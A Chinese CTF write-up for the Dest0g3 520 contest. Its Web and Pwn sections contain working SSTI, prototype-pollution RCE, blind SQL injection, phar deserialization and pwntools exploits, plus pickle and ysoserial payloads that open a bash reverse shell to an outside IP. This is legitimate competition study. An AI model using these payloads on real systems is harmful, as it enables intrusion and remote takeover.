Dest0g3 520迎新赛
积分榜
Web
SimpleRCE
非预期
盲读/flag,通过请求头传入参数绕过waf
预期
利用原生类!
phpdest
原题:https://www.shawroot.cc/1917.html
<?php
// Challenge source (phpdest): echoes its own source, pulls in flag.php, then
// includes whatever path the `file` query parameter names.
highlight_file(__FILE__);
require_once 'flag.php';
// The include path comes straight from the request: there is no allow-list,
// no realpath()/basename() normalisation and no scheme restriction, so any
// readable path or stream wrapper the PHP process can open is accepted.
if(isset($_GET['file'])) {
    require_once $_GET['file'];
}
payload:
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
EasyPHP
<?php
// Challenge source (EasyPHP). The three date() comparisons below can never be
// true (date("H") is 00-23, "d" is 01-31, "i" is 00-59), so the branch that
// echoes the flag is dead code; the only other place that prints it is the
// error handler registered further down.
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
    echo $fl4g;
}else{
    echo "Try harder!";
}
// From here on, any warning or notice prints the flag. The closure captures
// $fl4g by reference, so the later concatenation is visible to it.
set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }
);
// Unvalidated POST input is concatenated onto the flag; a non-string value
// here raises the notice that the handler above turns into output (see the
// write-up note that follows).
$fl4g .= $dest0g3;
?>
触发报错就可以把flag输出,直接传个数组进去就ok!
EasySSTI
学习了feng师傅的文章
https://blog.csdn.net/rfrder/article/details/115272645?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165313511116780366513158%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165313511116780366513158&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2blogfirst_rank_ecpm_v1~rank_v31_ecpm-5-115272645-null-null.nonecase&utm_term=ssti
payload如下:
{%set%0aid=dict(ind=a,ex=a)|join%}{%set%0app=dict(po=a,p=a)|join%}{%set%0ann=dict(n=a)|join%}{%set%0aenv=dict(env=a)|join%}{%set%0appe=dict(po=a,pen=a)|join%}{%set%0att=dict(t=a)|join%}{%set%0agt=dict(ge=a,t=a)|join%}{%set%0aff=dict(f=a)|join%}{%set%0aooqq=dict(o=a,s=a)|join%}{%set%0afive=(lipsum|string|list)|attr(id)(tt)%}{%set%0ard=dict(re=a,ad=a)|join%}{%set%0athree=(lipsum|string|list)|attr(id)(nn)%}{%set%0aone=(lipsum|string|list)|attr(id)(ff)%}{%set%0ashiba=five*five-three-three-one%}{%set%0axiahuaxian=(lipsum|string|list)|attr(pp)(shiba)%}{%set%0agb=(xiahuaxian,xiahuaxian,dict(glob=a,als=a)|join,xiahuaxian,xiahuaxian)|join%}{%set%0abin=(xiahuaxian,xiahuaxian,dict(built=a,ins=a)|join,xiahuaxian,xiahuaxian)|join%}{%set%0aini=(xiahuaxian,xiahuaxian,dict(in=a,it=a)|join,xiahuaxian,xiahuaxian)|join%}{%set%0achcr=(lipsum|attr(gb))|attr(gt)(bin)%}{{(lipsum|attr(gb))|attr(gt)(ooqq)|attr(ppe)(env)|attr(rd)()}}
NodeSoEasy
非预期
网上直接找到链子捡漏拿一血https://www.anquanke.com/post/id/236354#h2-2
{
"__proto__": {
"client": true,
"escapeFunction": "1; return global.process.mainModule.constructor._load('child_process').execSync('cat /flag');",
"compileDebug": true
}
}
预期
{"__proto__":{"__proto__":{"client":true,"escape":"1; return global.process.mainModule.constructor._load('child_process').execSync('dir');","compileDebug":true,"debug":true}}}
funny_upload
非预期
上传.htaccess文件直接预加载/flag获得flag
预期
传入base64编码后的图片马
使用.htaccess包含文件,并使用php://filter进行base64解码
这里没有查看phpinfo就直接进行系统命令执行了,所以才会出现非预期解那一步,以为是把什么过滤了
查看phpinfo,发现过滤了好多函数,连蚁剑看到根目录的flag,
或者使用var_dump(scandir('/'));
查看根目录,
之后就和非预期一样,使用蚁剑绕过disable未成功
middle
学习文章:
https://chenlvtang.top/2021/08/23/Python之Pickle反序列化/
https://www.cnblogs.com/cioi/p/12464592.html
直接手撕反序列化:
import pickle
import base64
payload = b'''cconfig\nbackdoor\n(]S"os.system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=|base64 -d|bash -i')"\natR.'''
print(base64.b64encode(payload))
print(pickle.loads(payload))
data=Y2NvbmZpZwpiYWNrZG9vcgooXVMib3Muc3lzdGVtKCdlY2hvIFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDODRNaTR4TlRjdU1UYzBMakl5Tmk4NU9UazVJREErSmpFPXxiYXNlNjQgLWR8YmFzaCAtaScpIgphdFIu
反弹shell
Really Easy SQL
hint:
$black_list=array('union','updatexml','order','by','substr',' ','and','extractvalue',';','sleep','join','alter','handler','char','+','/','like','regexp','offset','sleep','case','&','-','hex','%0','load’);
过滤了sleep,正确使用benchmark后成功得到注入点(都可以使用等价函数或者大小写绕过)。这里我在username和password放了相同的payload才有用,我不知道是为什么。
payload:
# 获得长度
0'or(if((length(({payload}))>{mid}),benchmark(200000,md5('123')),0))or'0
# 获取内容
0'or(if((ascii(mid(({payload}),{i},1))={j}),benchmark(200000,md5('123')),0))or'0
exp.py
import requests
from time import time, sleep
url = "http://9f802cce-9c30-432c-917b-e95b507b060e.node4.buuoj.cn:81/index.php" # 注入位置
# payload = "select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')"
# payload = "select(group_concat(column_name))from(information_schema.columns)where(table_schema='ctf')"
payload = "select(group_concat(cmd))from(ctf.flaggg)"
def lensqlblind():
start = 0
end = 100
while True:
mid = (start + end) // 2
data = {
'username':
f"0'or(if((length(({payload}))>{mid}),benchmark(200000,md5('123')),0))or'0",
'password':
f"0'or(if((length(({payload}))>{mid}),benchmark(200000,md5('123')),0))or'0"
}
t = time()
r = requests.post(url, data=data)
# print(r.request.body)
if start >= end:
return start
break
elif time() - t > 0.3:
start = mid + 1
else:
end = mid - 1
def contentblind(lenth):
flag = ''
i = 39
while i <= lenth:
for j in range(32, 127):
print(j, end='')
data = {
'username':
f"0'or(if((ascii(mid(({payload}),{i},1))={j}),benchmark(200000,md5('123')),0))or'0",
'password':
f"0'or(if((ascii(mid(({payload}),{i},1))={j}),benchmark(200000,md5('123')),0))or'0"
}
gap = 0.3
t = time()
r = requests.post(url, data=data)
while r.status_code != 200:
sleep(3)
gap += 3
r = requests.post(url, data=data)
if time() - t > gap:
flag += chr(j)
print()
print(flag)
i += 1
break
# lenth = lensqlblind()
# print(lenth)
# lenth = 10
# lenth = 21
lenth = 45
contentblind(lenth)
# database(): ctf
# tables: flaggg, user
# columns: cmd,username,password
# flaggg.cmd: Dest0g3{b6314cd5-cf5c-4478-b89c-e27643dff64e}
easysql
同理,就是过滤的东西比really多了点
payload:
# 获取长度
0'or(length(({payload}))!={mid})or(benchmark(300000,md5('123')))or'0
# 获取内容
0'or(mid(({payload}),{i},1)!='{j}')or(benchmark(300000,md5('123')))or'0
exp.py
import requests
from time import time, sleep
import string
url = "http://6d55819e-6ddf-481f-bb34-ad110a6613c8.node4.buuoj.cn:81/index.php" # 注入位置
# payload = "select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')"
# payload = "select(group_concat(column_name))from(information_schema.columns)where(table_schema='ctf')"
payload = "select(group_concat(cmd))from(ctf.flaggg)"
# payload = "database()"
def lensqlblind():
# start = 0
# end = 100
# while True:
for mid in range(40, 50):
# mid = (start + end) // 2
print(mid, end='')
data = {
'username':
f"0'or(length(({payload}))!={mid})or(benchmark(300000,md5('123')))or'0",
'password':
f"0'or(length(({payload}))!={mid})or(benchmark(300000,md5('123')))or'0"
}
gap = 0.8
t = time()
r = requests.post(url, data=data)
while r.status_code != 200:
sleep(3)
gap += 3
r = requests.post(url, data=data)
# print(r.request.body)
# if start >= end:
# return start
# break
# elif time() - t > 0.4:
# start = mid + 1
# else:
# end = mid - 1
if time() - t > gap:
print('')
return mid
break
def contentblind(lenth):
flag = ''
i = 33
while i <= lenth:
for j in "{}-,=" + string.digits + string.ascii_lowercase:
# for j in range(0, 127):
print(j, end='')
# j = chr(j)
data = {
'username':
f"0'or(mid(({payload}),{i},1)!='{j}')or(benchmark(300000,md5('123')))or'0",
'password':
f"0'or(mid(({payload}),{i},1)!='{j}')or(benchmark(300000,md5('123')))or'0"
}
gap = 0.8
t = time()
r = requests.post(url, data=data)
while r.status_code != 200:
sleep(3)
gap += 3
r = requests.post(url, data=data)
if time() - t > gap:
flag += j
print()
print(flag)
i += 1
break
# lenth = lensqlblind()
# print(lenth)
# lenth = 3
# lenth = 10
# lenth = 21
lenth = 45
contentblind(lenth)
# database(): ctf
# tables: flaggg, user
# columns: cmd,username,password
# flaggg.cmd: Dest0g3{b6314cd5-cf5c-4478-b89c-e27643dff64e}
# flaggg.cmd: Dest0g3{75773d9a-098c-49ac-ab34-714b7d25f471}
PharPOP
https://copyfuture.com/blogs-details/202112170451080648
构造pop链
<?php
class air{
public $p;
public function __construct()
{
// $this->p = new tree;
}
}
class tree{
public $name;
public $act;
public function __construct()
{
$this->name = new apple;
// $this->act = 'FilesystemIterator';
$this->act = 'SplFileObject';
}
}
class apple {
public $xxx;
public $flag;
public function __construct()
{
// $this->xxx = new air;
// $this->flag = 'glob:///f*';
$this->flag = '/fflaggg';
}
}
class banana {
public function __construct()
{
$this->name = new air;
}
}
$o = new tree;
$o->name->xxx = new air;
$o->name->xxx->p = new tree;
// echo serialize($o);
echo urlencode(serialize($o));
// class D {
// public $start = 'r';
// }
// $a = new D;
// echo serialize($a);
// echo "\n";
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("__HALT_COMPILER(); \?\>");
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
// echo urlencode(file_get_contents('234.phar.gz'));
修改构造好的phar文件,并修改内容强制GC(垃圾处理机制)http://blog.m1kael.cn/index.php/archives/14/
修改后phar文件会受损,需要修复
from hashlib import sha1
f = open('phar.phar', 'rb').read()
s = f[:-28]
h = f[-8:]
newf = s + sha1(s).digest() + h
open('234.phar', 'wb').write(newf)
修复好之后需要隐藏内容特征绕过waf
使用gzip绕过:https://guokeya.github.io/post/uxwHLckwx/
gzip 234.phar
然后进行上传
然后直接访问即可
EzSerial
反序列化利用工具:
https://github.com/frohoff/ysoserial
使用ysoserial打了下URLDNS发现dnslog有回显,把所有cc链都试了一遍都没反弹过来
猜测payload长度限制缩短payload工具,绕过长度检测:
https://github.com/4ra1n/ShortPayload
通过cc6反弹成功,这里非常注意反弹shell的写法,一定不能错!
正确的反弹shell
java -jar ShortPayload-1.0.jar CC6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"
这是错误的!
java -jar ShortPayload-1.0.jar CC6 "echo YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=|base64 -d|bash -i"
ezip
setu有源码:
upload.php:
<?php
// Upload handler (challenge source, upload.php): accepts one .zip, stores it
// under a freshly generated directory and hands it to zip::unzip().
error_reporting(0);
include("zip.php");
if(isset($_FILES['file']['name'])){
    // Rejects ".." and "/" anywhere in the client-supplied file name. The
    // name is still used verbatim in the destination path below, so this
    // substring check is the only guard on it.
    if(strstr($_FILES['file']['name'],"..")||strstr($_FILES['file']['name'],"/")){
        echo "hacker!!";
        exit;
    }
    // Only the outer archive's extension is checked here; entries inside the
    // archive are handled in zip::unzip().
    if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION)!="zip"){
        echo "only zip!!";
        exit;
    }
    // gen_path() picks the random directory name; mkdir() result is unchecked.
    $Myzip = new zip($_FILES['file']['name']);
    mkdir($Myzip->path);
    move_uploaded_file($_FILES['file']['tmp_name'], './'.$Myzip->path.'/' . $_FILES['file']['name']);
    echo "Try to unzip your zip to /".$Myzip->path."<br>";
    if($Myzip->unzip()){echo "Success";}else{echo "failed";}
}
zip.php:
<?php
class zip
{
    // Client-supplied archive name (validated only by the substring checks in upload.php).
    public $zip_name;
    // Random per-upload directory name, relative to the web root.
    public $path;
    // ZipArchive instance used by unzip().
    public $zip_manager;
    public function __construct($zip_name){
        $this->zip_manager = new ZipArchive();
        $this->path = $this->gen_path();
        $this->zip_name = $zip_name;
    }
    // Builds the upload directory name: 15 characters picked from a shuffled
    // alphanumeric alphabet, mixed with time()/microtime() and md5-hashed.
    // Note: shuffle()/array_rand() are not cryptographic sources; the name
    // is unguessable in practice only because of the md5 over the timestamp mix.
    public function gen_path(){
        $chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        $newchars=str_split($chars);
        shuffle($newchars);
        $chars_key=array_rand($newchars,15);
        $fnstr = "";
        for($i=0;$i<15;$i++){
            $fnstr.=$newchars[$chars_key[$i]];
        }
        return md5($fnstr.time().microtime()*100000);
    }
    // Recursively removes everything below $dir; the directory itself is left
    // for the caller to rmdir(). NOTE(review): `while ($file = readdir(...))`
    // stops early on an entry literally named "0", because that string is falsy
    // in PHP; `!== false` would be the robust condition.
    public function deldir($dir) {
        // first delete the files inside the directory:
        $dh = opendir($dir);
        while ($file = readdir($dh)) {
            if($file != "." && $file!="..") {
                $fullpath = $dir."/".$file;
                if(!is_dir($fullpath)) {
                    unlink($fullpath);
                } else {
                    $this->deldir($fullpath);
                }
            }
        }
        closedir($dh);
    }
    // Lists the entries of $directory, excluding "." and "..". Same "0" entry
    // caveat as deldir(): the loop condition treats the string "0" as end-of-list.
    function dir_list($directory)
    {
        $array = [];
        $dir = dir($directory);
        while ($file = $dir->read()) {
            if ($file !== '.' && $file !== '..') {
                $array[] = $file;
            }
        }
        return $array;
    }
    // Extracts the uploaded archive into $this->path, then removes anything
    // that is not an image by extension.
    // NOTE(review), defender's view of this design:
    //  - the only guard on entry names is a substring match for "../"; there
    //    is no check of the resolved destination path;
    //  - the extension whitelist is applied *after* extractTo(), so every
    //    entry is written to the web root first and only then deleted;
    //  - is_dir() below is given a relative path while deletion uses an
    //    absolute one, so the two agree only when the cwd is /var/www/html.
    // Validating entries (and their extensions) before extraction, or
    // extracting into a directory outside the web root, would close these gaps.
    public function unzip()
    {
        $fullpath = "/var/www/html/".$this->path."/".$this->zip_name;
        $white_list = ['jpg','png','gif','bmp'];
        $this->zip_manager->open($fullpath);
        for ($i = 0;$i < $this->zip_manager->count();$i ++) {
            if (strstr($this->zip_manager->getNameIndex($i),"../")){
                echo "you bad bad";
                return false;
            }
        }
        if(!$this->zip_manager->extractTo($this->path)){
            echo "Unzip to /".$this->path."/ failed";
            exit;
        }
        @unlink($fullpath);
        $file_list = $this->dir_list("/var/www/html/".$this->path."/");
        for($i=0;$i<sizeof($file_list);$i++){
            if(is_dir($this->path."/".$file_list[$i])){
                echo "dir? I deleted all things in it"."<br>";@$this->deldir("/var/www/html/".$this->path."/".$file_list[$i]);@rmdir("/var/www/html/".$this->path."/".$file_list[$i]);
            }
            else{
                if(!in_array(pathinfo($file_list[$i], PATHINFO_EXTENSION),$white_list)) {echo "only image!!! I deleted it for you"."<br>";@unlink("/var/www/html/".$this->path."/".$file_list[$i]);}
            }
        }
        return true;
    }
}
压缩shell.php和1.txt为zip,用010修改如下:
直接访问上传的php
这里读取flag需要使用nl,suid提权!
ljctr
查看DemoApplication.jar
Reverse
simpleXOR
#include<stdio.h>
#include<stdlib.h>
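/*
 * simpleXOR solver: each byte of the table was produced by adding its index
 * and XORing with 0xf7, so the inverse is (byte ^ 0xf7) - index.
 *
 * Fixes relative to the original listing: the loop printed `result_0[i]`,
 * an identifier that is never declared (the array is `result`), and the
 * stray `;` after main's closing brace is dropped. The table is held as
 * unsigned char so the values above 0x7f and the wraparound are well-defined;
 * the length is derived from the array instead of being repeated as 36.
 */
int main()
{
    unsigned char result[] =
    {
        0xB3, 0x91, 0x82, 0x80, 0xC3,
        0x9B, 0xCE, 0x75, 0xCF, 0x9C,
        0x9A, 0x85, 0x85, 0xCD, 0xB8,
        0x84, 0xAA, 0x7D, 0xBD, 0xBB,
        0xB1, 0xB5, 0x96, 0x71, 0x8D,
        0x9E, 0x86, 0xBF, 0x73, 0xA8,
        0xA3, 0x9C, 0x83, 0x65, 0x9E,
        0x57
    };
    const size_t n = sizeof result / sizeof result[0];
    for (size_t i = 0; i < n; i++)
    {
        /* Undo the encoding in place; the cast keeps the low byte only. */
        result[i] = (unsigned char)((result[i] ^ 0xf7) - i);
        printf("%c", result[i]);
    }
    return 0;
}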
hi
x = [0x7B, 0x51, 0xF3, 0x5A, 0xCC, 0x39, 0xF9, 0x92, 0x1C, 0x9E, 0x58, 0x69, 0x9D, 0xF7, 0xFD, 0x4A, 0x3E, 0xFB, 0x1D, 0x2C, 0x4D, 0x0C, 0x70, 0xB1, 0x3B, 0x8D, 0x25, 0xED, 0x91, 0xB1, 0x73, 0x8D, 0x82, 0xE6, 0xE7, 0x50, 0x20, 0x61, 0x62, 0x3C, 0x00, 0x3A, 0xA6, 0x9D, 0x32]
v6 = [0x97, 0x64, 0x48, 0xC6, 0x1C, 0x7A, 0x8E, 0x9F, 0x46, 0xBD,0x60, 0xE7, 0x82, 0xF3, 0xEE, 0x69, 0x49, 0xF7, 0x0E, 0xE3,0xE2, 0x17, 0xC0, 0xB9, 0x2C, 0x39, 0x30, 0xA4, 0x48, 0x01,0x41, 0x98, 0x39, 0xA9, 0xB5, 0xE5, 0x11, 0x74, 0x0E, 0xE8,0xAC, 0xFD, 0x8B, 0xA5, 0x6D]
flag = ''
# `x` is the per-position additive constant and `v6` the expected value; for
# each position try every printable character j and keep those for which the
# checker's arithmetic matches.  The original expression
#   (((v5 + x[i]) >> 31) >> 24) + v5 + x[i] - (((v5 + x[i]) >> 31) >> 24) & 0xff
# reduces to (23 * j + x[i]) & 0xff: `&` binds loosest, and the two shifted
# terms are 0 for non-negative ints and cancel regardless.
for add_const, expected in zip(x, v6):
    for candidate in range(32, 128):
        if (23 * candidate + add_const) & 0xff == expected:
            flag += chr(candidate)
print(flag)
tttea
TLS先赋值
再计算
0x03, 0x23, 0x22, 0x2F, 0x36, 0x88, 0xFD, 0x43, 0x21, 0xE8,
0x5B, 0x65, 0x31, 0x1E, 0x3B, 0xA6, 0x4B, 0xB8, 0xDC, 0x88,
0x80, 0x19, 0x84, 0x6F, 0x97, 0x72, 0x21, 0x26, 0xAD, 0x64,
0xEE, 0xBB, 0x88, 0x04, 0x4D, 0x06, 0x2F, 0x26, 0xE5, 0x6B,
0x81, 0x4B, 0xF5, 0x73
0x2f222303,0x43fd8836,0x655be821,0xa63b1e31,0x88dcb84b,0x6f841980,0x26217297,0xbbee64ad,0x064d0488,0x6be5262f,0x73f54b81
魔改了两处,有两个tls回调函数,需要改ZF寄存器执行if语句内部,得到delta
这里原xxtea是右移5
然后可以看出a3是delta,key取a3的四个字节,也就是将0x74746561小端序变成
0x61,0x65,0x74,0x74填充key
exp
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x74746561
#define MX (((z >> 6 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z)))
/*
 * XXTEA ("Corrected Block TEA") with the two modifications the write-up
 * identifies: DELTA is 0x74746561 instead of the standard 0x9e3779b9, and
 * the MX macro above shifts z right by 6 where the reference shifts by 5.
 *
 *   v   : n 32-bit words, transformed in place
 *   n   : |n| is the word count; n > 1 encrypts, n < -1 decrypts,
 *         |n| <= 1 leaves v untouched
 *   key : four 32-bit words
 *
 * MX reads y, z, sum, e, p and key from this scope by name, so those
 * identifiers must not be renamed.
 */
void btea(uint32_t *v, int n, uint32_t const key[4])
{
    uint32_t y, z, sum;
    unsigned p, rounds, e;
    if (n > 1) /* Coding Part */
    {
        rounds = 6 + 52 / n;
        sum = 0;
        z = v[n - 1];
        do
        {
            sum += DELTA;
            e = (sum >> 2) & 3; /* selects which key word MX mixes in this round */
            for (p = 0; p < n - 1; p++)
            {
                y = v[p + 1];
                z = v[p] += MX;
            }
            y = v[0];
            z = v[n - 1] += MX;
        } while (--rounds);
    }
    else if (n < -1) /* Decoding Part */
    {
        n = -n;
        rounds = 6 + 52 / n;
        /* Start from the sum the encryption finished with and walk it back. */
        sum = rounds * DELTA;
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p = n - 1; p > 0; p--)
            {
                z = v[p - 1];
                y = v[p] -= MX;
            }
            z = v[n - 1];
            y = v[0] -= MX;
            sum -= DELTA;
        } while (--rounds);
    }
}
/* Emits the four bytes of w, least significant byte first. */
static void put_word_le(uint32_t w)
{
    for (int shift = 0; shift < 32; shift += 8)
    {
        putchar((int)((w >> shift) & 0xFF));
    }
}

/*
 * Decrypts the challenge's 11-word ciphertext with the modified XXTEA and
 * prints the plaintext bytes in little-endian word order.
 *
 * The input bytes listed in the write-up are grouped four at a time into
 * little-endian words, e.g. 03 23 22 2F -> 0x2f222303; the key is the four
 * bytes of DELTA (0x74746561) in little-endian order, one byte per key word.
 */
int main()
{
    uint32_t v[11] = {0x2f222303, 0x43fd8836, 0x655be821, 0xa63b1e31, 0x88dcb84b, 0x6f841980, 0x26217297, 0xbbee64ad, 0x64d0488, 0x6be5262f, 0x73f54b81};
    uint32_t const k[4] = {0x61, 0x65, 0x74, 0x74};
    int n = sizeof(v) / sizeof(v[0]);

    /* A negative word count selects btea's decoding branch. */
    btea(v, -n, k);

    printf("解密后数据:\n");
    for (int i = 0; i < n; i++)
    {
        put_word_le(v[i]);
    }
    printf("\n");
    return 0;
}
Pwn
ez_aarch
from pwn import *
context.binary = 'stack'
io = remote('node4.buuoj.cn', 28579)
payload = p64(0)*5 + p32(0x93C)
io.sendafter(b'Please leave your name:\n', payload)
io.interactive()
ez_pwn
from pwn import *
from LibcSearcher import LibcSearcher
context.binary = './ez_pwn'
io = remote('node4.buuoj.cn', 27361)
def hex_uint32(n):
return hex((n + 0x100000000) & 0xFFFFFFFF)
def add_num(num):
io.sendlineafter(b'input your choice:\n', b'1')
io.sendlineafter(b'input num\n', num)
def get_num():
io.sendlineafter(b'input your choice:\n', b'2')
io.recvuntil(b'sum = ')
return int(io.recvuntil(b'\n', drop=True))
io.sendlineafter(b'input the length of array:\n', b'-1')
for i in range(6):
add_num(b'0')
add_num(b'+')
x = get_num()
libc_base = x - 0x6e155
print(hex_uint32(x))
for i in range(7, 18):
add_num(b'+')
add_num(str(libc_base + 0x3cdea).encode())
io.sendlineafter(b'input your choice:\n', b'4')
io.interactive()
Crypto
babyRSA
工具真好用,费马分解n之后直接解明文就好
babyAES
先转hex
import binascii
ass = [
    b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07',
    b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80',
    b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F',
]
# Print each blob (ciphertext, then two 16-byte values) as lowercase hex.
# str(binascii.b2a_hex(a))[2:-1] in the original is exactly bytes.hex().
for blob in ass:
    print(blob.hex())
# 43343a865124b0d11ba94c00ada3ff9620684a1b7e1cd1798741fe30e2fbc7b77f5ec89a50da58c6df176c3d4b95d037
# d1df8f290877def9795825ca5bcb1880
# a4a64dab7bf697943e684b9b42655d46
工具解密666
ezDLP
import sympy
from Crypto.Util.number import *
# Discrete-log instance: generator g, modulus p, target h. The flag is the
# exponent x with g**x == h (mod p).
g = 19
p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839870641607412102746854257629226877248337002993023452385472058106944014653401647033456174126976474875859099023703472904735779212010820524934972736276889281087909166017427905825553503050645575935980580803899122224368875197728677516907272452047278523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736573246893588079033524476111268686138924892091575797329915240849862827621736832883215569687974368499436632617425922744658912248644475097139485785819369867604176912652851123185884810544172785948158330991257118563772736929105360124222843930130347670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501371279295621820181402191463184275851324378938021156631501330660825566054528793444353
h = 199533304296625406955683944856330940256037859126142372412254741689676902594083385071807594584589647225039650850524873289407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007735707550914742749524818990843357217489433410647994417860374972468061110200554531819987204852047401539211300639165417994955609002932104372266583569468915607415521035920169948704261625320990186754910551780290421057403512785617970138903967874651050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326538607106089620201074331099713506536192957054173076913374098400489398228161089007898192779738439912595619813699711049380213926849110877231503068464392648816891183318112570732792516076618174144968844351282497993164926346337121313644001762196098432060141494704659769545012678386821212213326455045335220435963683095439867976162
# sympy.discrete_log(n, a, b) returns x such that b**x == a (mod n); note the
# argument order (modulus, target, base). That it finishes on a modulus this
# size presumably relies on p - 1 having small factors -- TODO confirm.
x = sympy.discrete_log(p, h, g)
print(x)
# The exponent itself encodes the flag bytes.
print(long_to_bytes(x))
直接输出flag
ezStream
from Crypto.Util.number import *
from alive_progress import alive_bar
# LCG parameters (multiplier, increment, modulus) read by the LCG class below.
a = 3939333498
b = 3662432446
m = 2271373817
# The two truncated outputs (state >> 16) that the commented-out seed search
# below matched against.
state1 = 17362
state2 = 20624
class LCG:
    """Truncated linear congruential generator used by the challenge.

    The multiplier, increment and modulus are taken from the module-level
    ``a``, ``b`` and ``m`` at construction time; ``next`` advances the full
    state but exposes only the bits above the low 16.
    """

    def __init__(self, seed):
        self.a, self.b, self.m = a, b, m
        self.seed = seed

    def next(self):
        """Step the state once and return ``state >> 16``."""
        advanced = self.seed * self.a + self.b
        self.seed = advanced % self.m
        return self.seed >> 16

    def output(self):
        """Print the parameters and then the next two truncated outputs.

        Each print consumes one generator step, so calling this advances the
        state twice.
        """
        print("a = {}\nb = {}\nm = {}".format(self.a, self.b, self.m))
        first = self.next()
        print("state1 = {}".format(first))
        second = self.next()
        print("state2 = {}".format(second))
# with alive_bar(0x10000000) as bar:
# for i in range(0x10000000):
# lcg = LCG(i)
# if lcg.next() == state1:
# if lcg.next() == state2:
# print(i)
# break
# bar()
# 104984523
enc_flag_i = 600017039001091357643174067454938198067935635401496485588306838343558125283178792619821966678282131419050878
flag = ''
# Re-create the generator from the seed the (commented-out) search found.
# output() prints and consumes the two published states, so decryption below
# starts from the third output.
lcg = LCG(104984523)
lcg.output()
enc_flag = long_to_bytes(enc_flag_i)
print(enc_flag)
cur = 0
pt = ['*'] * len(enc_flag)
for _ in enc_flag:
    # Each byte was XORed with the last decimal digit of one generator output;
    # only printable ASCII is accepted as plaintext.
    key_digit = lcg.next() % 10
    target = enc_flag[cur]
    hit = next((k for k in range(32, 127) if k ^ key_digit == target), None)
    # The position advances only on a hit, so an unmatched byte is retried
    # against the next generator output (same as the original loop).
    if hit is not None:
        pt[cur] = chr(hit)
        cur += 1
print(''.join(pt))
Misc
Welcome to fxxking DestCTF
公众号签个到:Dest0g3{W31c0m3_t0_DestCTF2022!}
Pngenius
binwalk分离压缩包,密码解压里边就是flag
EasyEncode
6位密码爆破
摩斯密码
Hex解码
Unicode decode
urldecode
base64 decode
之后获得flag:Dest0g3{Deoding_1s_e4sy_4_U}
StrangeTraffic
RGVzdDBnM3szMUE1QkVBNi1GMjBELUYxOEEtRThFQS0yOUI0RjI1NzEwOEJ9
Dest0g3{31A5BEA6-F20D-F18A-E8EA-29B4F257108B}
你知道js吗
改zip,word/document.xml里边base64解码
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
base64解码获得
+++++ ++[-> +++++ ++<]> +++.. ++.-. ++.-- --.++ ++.--
-.-.- --.++ ++++.
+.--- -..++ ++.<+ ++[-> +++<] >++.< +++[-
>---< ]>--- ---.+ ++++. -----
.+++. ...-- ---.+ ++++. ---.+ ++.-- ---.+ ++++. ---.. +++++ +.--- ----.
<++++ [->++ ++<]> ++.<+ +++[- >---- <]>-. ---.+
+++++ .---- -.++. ++.+.
--.-- .<+++ +[->+ +++<] >++.< ++++[ ->--- -<]>-
.+.-. ---.+ ++.+. -.+++
+.--- --.<+ +++[- >++++ <]>++ .<+++ [->-- -<]>- ----. ----. +.+++ +.---
-.--- .+++. -..<+ +++[- >++++ <]>++
.<+++ +[->- ---<] >-.++ +++.- ----.
+++.. ---.+ ++.-- --.+. ..+++ +.-.- ----. +++++
.---- .+.++ ++.-- --.++
++.-. ----. +.-.+ ++++.
<+++[ ->+++ <]>++ ++.<
Brainfuck加密https://www.splitbrain.org/services/ook
EasyWorld
额,查到了原题https://www.icode9.com/content-4-961968.html
压缩包密码没改为:2zhlmcl,1hblsqt.
,直接打开获得flag即可
4096
俩端拨号键,中间sstv传输
使用Audacity把中间那一段删除提取拨号键
DTMF拨号键:
http://dialabc.com/sound/detect/index.html
号码是:13879085947
sstv传输
MD5(cell phone number),压缩包密码为:32fc1b5487cb447f792a19418b92544e
获得图片,使用gaps进行拼接
gaps --image=part_flag.jpg --size=64
拼接测试为:RGVzdDBnM3tlZDRkMTE0Zi05ZWU0LQ==
第一段:Dest0g3{ed4d114f-9ee4-
/js/local_storage_manager.js
文件中有
Congratulations, this is part of the flag: NGVlNy1iNjczLTk3MWQ4MWY4YjE3N30=.
Dest0g3{ed4d114f-9ee4-4ee7-b673-971d81f8b177}
